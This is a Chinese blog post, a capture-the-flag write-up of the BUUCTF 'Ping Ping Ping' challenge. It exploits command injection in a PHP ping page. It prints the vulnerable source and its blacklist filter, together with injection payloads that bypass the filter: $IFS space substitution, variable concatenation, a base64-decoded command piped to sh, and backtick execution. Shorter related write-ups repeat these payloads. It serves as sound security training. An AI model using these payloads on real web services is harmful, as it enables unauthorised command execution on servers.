BUUCTF WEB [GXYCTF2019]Ping Ping Ping

最新推荐文章于 2023-11-11 19:30:40 发布
最新推荐文章于 2023-11-11 19:30:40 发布
阅读量1.4k 收藏
点赞数 1
分类专栏: BUUCTF 文章标签: web安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_51412071/article/details/124075636
版权
本文讲述了在BUUCTFWEB[GXYCTF2019]挑战中,通过发现命令执行漏洞,逐步绕过字符过滤,实现`cat flag.php`和`base64解码`等技术,最终获取flag的过程。涉及空格绕过、变量拼接、编码解码和内联执行等技巧。
摘要由CSDN通过智能技术生成

BUUCTF WEB [GXYCTF2019]Ping Ping Ping

进入题目后根据提示提交?ip=127.0.0.1尝试

回显PING 127.0.0.1 (127.0.0.1): 56 data bytes

判断存在命令执行漏洞,尝试提交?ip=127.0.0.1;ls

回显

PING 127.0.0.1 (127.0.0.1): 56 data bytes
flag.php
index.php

尝试访问index.php?ip=127.0.0.1;cat index.php

回显fxck your space!,说明空格存在过滤,尝试使用$IFS进行绕过

空格绕过的技巧

  1. Linux

    {cat,flag.txt} 
cat${IFS}flag.txt
cat$IFS$9flag.txt
cat<flag.txt
cat<>flag.txt
kg=$'\x20flag.txt'&&cat$kg
(\x20转换成字符串就是空格,这里通过变量的方式巧妙绕过)

  2. Windows

    type.\flag.txt
type,flag.txt
echo,123456

这里发现{<%等符号就被禁用,只有$IFS$9可以使用

若单独使用$IFS会被理解为解析没有结束,将后面的字符也当做参数解析。若配合$IFS$9使用,在$IFS后加上了一个不存在的变量,解析为空,从而结束解析,正常执行$IFS后面的内容

index.php

执行命令?ip=127.0.0.1;cat$IFS$9index.php

<?php
if(isset($_GET['ip'])){
  $ip = $_GET['ip'];
  if(preg_match("/\&|\/|\?|\*|\<|[\x{00}-\x{1f}]|\>|\'|\"|\\|\(|\)|\[|\]|\{|\}/", $ip, $match)){
    echo preg_match("/\&|\/|\?|\*|\<|[\x{00}-\x{20}]|\>|\'|\"|\\|\(|\)|\[|\]|\{|\}/", $ip, $match);
    die("fxck your symbol!");
  } else if(preg_match("/ /", $ip)){
    die("fxck your space!");
  } else if(preg_match("/bash/", $ip)){
    die("fxck your bash!");
  } else if(preg_match("/.*f.*l.*a.*g.*/", $ip)){
    die("fxck your flag!");
  }
  $a = shell_exec("ping -c 4 ".$ip);
  echo "<pre>";
  print_r($a);
}

?>

绕过过滤读取flag.php

  1. 变量拼接字符串绕过

    b=ag.php;a=fl;cat$IFS$9$a$b 
 
//为什么要反过来?flag匹配时中间有内容也会被匹配。
//表达式 .* 就是单个字符匹配任意次,即贪婪匹配。以这个表达式为例:a.*b,它将会匹配最长的以a开始,以b结束的字符串。如果用它来搜索aabab的话,它会匹配整个字符串aabab。这被称为贪婪匹配

  2. sh命令执行绕过

    base64编码绕过flag过滤

    • 加密命令

      echo “cat flag.php” | base64

    • 解密命令并执行

      ?ip=127.0.0.1;echo$IFS$9Y2F0IGZsYWcucGhwCg==$IFS$9|$IFS$9base64$IFS$9-d$IFS$9|$IFS$9sh

  3. 内联执行绕过

    ?ip=127.0.0.1;cat$IFS$9`ls`

得到flag

flag{db07f60d-63b3-4ab7-a14e-fe94a6cab83e}

Y1Daa
关注
  • 1
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
GXYCTF2019 Ping Ping Ping 1
qq_52715164的博客
04-17 1404
解题步骤: 1,尝试用输入一个正确的IP地址 2,发现是linux系统下的网站,尝试用|和ls查看目录,列出文件 3,尝试查看flag文件,发现不能直接打开,且空格被过滤,原因:关键字被过滤 4,找到被过滤字符名单,尝试打开index.php文件,发现过滤字符列表 5,尝试绕过 代码中有个 $a 考虑进行变量覆盖,构造如下 payload ?ip=1;a=f;d=ag;c=l;cat$IFS$a$c$d.php ?ip=127.0.0.1;a=g,cat$IFS$1fla$a.php 或者另外一种方
BUUCTF-Web:[GXYCTF2019]Ping Ping Ping
m0_56161093的博客
04-26 2118
题目 解题过程 1、题目页面提示?ip=,猜测是让我们把这个当做变量上传参数,由此猜想是命令注入 2、用管道符加上linux常用命令ls(windwos可以尝试dir)试试 所谓管道符(linux)的解释与用法如下: 尝试命令: ?ip=127.0.0.1;ls 看到flag.php,那就使用cat flag.php命令尝试读取 ?ip=127.0.0.1;cat flag.php 被过滤了空格,过滤空格的方法如下: $IFS ${IFS} $IFS$1 //$1改成$加其他数字貌似都行 &l
BUUCTF WEB [GXYCTF2019]Ping Ping Ping1
guishengyx的博客
10-19 185
直接试试传参ip 他确实去ping了 昨天也碰到过一个差不多的题目 所以试一下linux的指令 ?ip=192.168.1.1;ls 成功了 果然是linux 尝试打开flag.php 看提示应该是过滤了空格 上百度找到了几种代替空格的方法 %20(space)、%09(tab)、$IFS$9、${IFS}$9、 {IFS}、IFS 测试发现括号也被过滤了 所以使用$IFS$9代替空格 继续打开flag.php 还是失败了 试试打开index.php c...
BUUCTF-Web-命令执行-[GXYCTF2019]Ping Ping Ping
weixin_42566218的博客
03-09 4751
BUUCTF-Web-命令注入-[GXYCTF2019]Ping Ping Ping 题目链接:BUUCTF 类型:命令注入 知识点:命令注入黑名单绕过方法 解题方法:6种 解题过程 0x1.base64绕过 目标使用ip变量进行get传参,通拼接符号";"执行ls命令,发现目标过滤了空格 因为是linux环境,使用分隔符$IFS进行绕过 ?ip=127.0.0.1;命令$IFS$1参数 配合cat查看源码,发现过滤了很多绕过黑名单的关键字符,并且对"flag"名称字符串进行严格的过
BUUCTF:[GXYCTF2019]Ping Ping Ping
末初的CSDN博客
10-20 1637
题目地址:https://buuoj.cn/challenges#[GXYCTF2019]Ping%20Ping%20Ping ?ip=明显存在命令执行注入,使用;或者|闭合上一条命令 经过fuzz测试,过滤了空格、bash字符、flag字符、以及一些特殊符号 空格绕过这里使用$IFS$9 /?ip=;id;whoami;pwd;ls;ls$IFS$9-lha 我做题时用的是 /?ip=;cat$IFS$9`ls` 直接将当前目录下所有文件全部cat出来,查看源码发现flag 题.
web页面实现ping 命令
02-02
在网页上实现ping和Tracert命令,是网络诊断功能的一种创新应用,它允许用户在浏览器环境中检查网络连接状态和追踪数据包路由。这在网页开发、网络故障排查或者普通用户了解网络状况时非常有用。下面我们将详细探讨...
javascript模拟的Ping效果代码 (Web Ping
10-28
JS虽然发送不了真正Ping的ICMP数据包,但Ping的本质仍然是请求/回复的时间差,HTTP自然可以实现此功能.
LabVIEW实现网络Ping IP测试
07-10
在这个“LabVIEW实现网络Ping IP测试”的项目中,我们可以通过LabVIEW编写程序来模拟操作系统中的ping命令,对指定的IP地址进行连通性检测。 **一、LabVIEW基础知识** 1. **图形化编程**:LabVIEW采用G语言...
WebSite ping实现.zip
06-03
标题 "WebSite ping实现.zip" 涉及到的是在Web环境中实现类似于操作系统中的"Ping"功能。在操作系统中,Ping是一个网络诊断工具,用于测试两台设备之间的网络连接是否畅通。在这里,我们讨论的是如何在Web应用中创建...
buuctf [GXYCTF2019]Ping Ping Ping
SopRomeo的博客
03-15 791
进去就要我们ping ip ,看看能不能命令执行 ?ip=127.0.01;ls发现可行 看到有flag ,不能cat,可远观而不可亵玩呼! 百度了命令执行绕过方法 试了很久,个人觉得这题有bug a=a.php;b=fl;c=cat;$c$b$a 如果把ag.php放后面就不行… a=cat;b=fl;c=ag.php;$c$b$a flag在源代码里 ...
buuctf-web-[GXYCTF2019]Ping Ping Ping-wp
居上
06-28 216
[GXYCTF2019]Ping Ping Ping 知识点 变量拼接 sh,bash下编码 绕过空格过滤 绕过关键字过滤 过程 主页: ?ip=127.0.0.1 ?ip=127.0.0.1;ls ?ip=127.0.0.1;cat flag.php 过滤了空格,使用$IFS$1来绕过 ?ip=127.0.0.1;cat$IFS$1flag.php 过滤了flag,但是可以查看下index.php ?ip=127.0.0.1;cat$IFS$1index.php |
BUUCTF WEB ping ping ping
qq_41696858的博客
08-19 268
这题考的是有过滤的远程命令注入 判断很容易,?ip=127.0.0.1|ls 成功发现当前目录index.php和flag.php 下面就是读取了。尝试直接cat,当然不行?ip=127.0.0.1|cat flag.php 回显空格被过滤了,经过测试,管道符,{}都被过滤了,那么就是一个过waf问题了,多掌握几种绕过方式 这题的考点是$IFS,我之前也没接触了,看了这篇文章感觉茅塞顿开,感谢大佬 https://blog.csdn.net/Sacrifice_li/article/details/1088
BUUCTFWebPing Ping Ping
qq_70434663的博客
03-02 797
首先使用ls命令查看当前路径下有那些文件,拼接符有“&”、“|”、“||”、“&&”、“;进入靶场后是一个ping的功能(命令执行漏洞),参数ip传递的内容会被当做ip地址进行网络连通性测试。绕过空格后发现过滤了flag(绕过flag),所以使用反引号``(高优先级特性)查看flag.php。绕过后我们并没有发现flag,那是因为注释的内容不会直接显示在页面中,右键查看源码就可以获取flag。接下来直接访问flag.php文件,直接访问PHP发现空格过滤了(绕过空格),所以我们使用$IFS$9来绕过空格。
BUUCTFWEB】题:Ping Ping Ping
最新发布
于高山之巅,方见大河奔涌;于群峰之上,更觉长风浩荡。
11-11 284
发现 index.php 也没什么效果,那有可能是 空格 被过滤了,用 IFS 代替(IFS是系统命令空格的意思),前后面加。所以对于 flag.php 不能直接用 cat,既然 flag 被过滤了,可以尝试用变量来代替 flag。输入 flag.php 结果显示 fxck your flag 可能是 flag 被过滤掉了。不出所料,过滤掉了很多东西,这里{}被过滤了,所以{IFS}这个不行。既然 flag.php 看不了那就试试 index.php。是为了固定这个语句,不然和其他字符串行会出错,后面的。
BUUCTF Web [GXYCTF2019]Ping Ping Ping
热门推荐
wangyuxiang946的博客
10-28 1万+
「作者主页」:士别三日wyx   此文章已录入专栏《网络攻防》,持续更新热门靶场的通关教程 「未知攻,焉知收」,在一个个孤独的夜晚,你完成了几百个攻防实验,回过头来才发现,已经击败了百分之九十九的同期选手。 [GXYCTF2019]Ping Ping Ping一、题目简介二、思路分析1)多命令执行2)绕过空格3)绕过flag三、解题步骤1)查看当前目录2)查看文件内容3)flag 在注释中四、总结 一、题目简介 进入连接后是一个「ping」的功能,参数 ip 传递的内容会被当做 ip.
buuctf刷题记录 -- [GXYCTF2019]Ping Ping Ping
又菜又爱倒腾的博客
11-16 823
BUUCTFweb刷题记录(一) -- [GXYCTF2019]Ping Ping Ping
BUUCTF刷题记录 Ping Ping Ping
m0_46576074的博客
05-16 1803
[GXYCTF2019]Ping Ping Ping 进入页面 然后/?ip=127.0.0.1|ls 进入 读取flag.phpcat$IFS$1indnx.php 再变量拼接 ?ip=127.0.0.1;a=g;cat$IFS1fla1fla1flaa.php 转至 http://1d22a0a5-c6a0-43f1-8e52-e5a33ec7e044.node3.buuoj.cn/?ip=127.0.0.1;a=g;cat$IFS1fla1fla1flaa.php 再F12 ...
云演CTF web题型 ping
cadandme的博客
01-19 1952
ping 打开页面提示用GET方式提交ip 尝试管道符分隔命令查看目录,没回显,被禁用 在这里我尝试了好久,忘记有哪些命令分隔符可以代替了,查找后才知道 Linux下一般的命令分隔符有这几个 | || & && . ; - <> $ %0a %0d ` 逐个尝试,%0a可以使用 到这一步,我们就可以看出flag就在fL4g_1s_He4r_______中了,直接查看,得到flag ...
web-[GXYCTF2019]Ping Ping Ping
wojiushilsy的博客
05-14 696
题目要点题目内容解题方法一:命令执行变量拼接方法二:过滤bash用sh执行方法三:内联执行(将反引号内命令的输出作为输入执行) 题目要点 linux常见绕过方法 $IFS$9(空格) 命令执行变量拼接 /?ip=127.0.0.1;a=g;cat$IFS$1fla$a.php 过滤bash用sh执行 echo$IFS$1Y2F0IGZsYWcucGhw|base64$IFS$1-d|sh 内联执行 将反引号内命令的输出作为输入执行 题目内容 解题 打开链接,提示 /?ip在url输入.
buuctf web Ping Ping Ping
08-04
根据引用[1]和引用[2]的内容,题目"buuctf web Ping Ping Ping"涉及到多命令执行和绕过空格的问题。根引用[2]中的思路分析,可以使用反引号来绕过空格过滤,并执行ls命令来查询文件名。构造的payload如下:?ip=1;cat...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值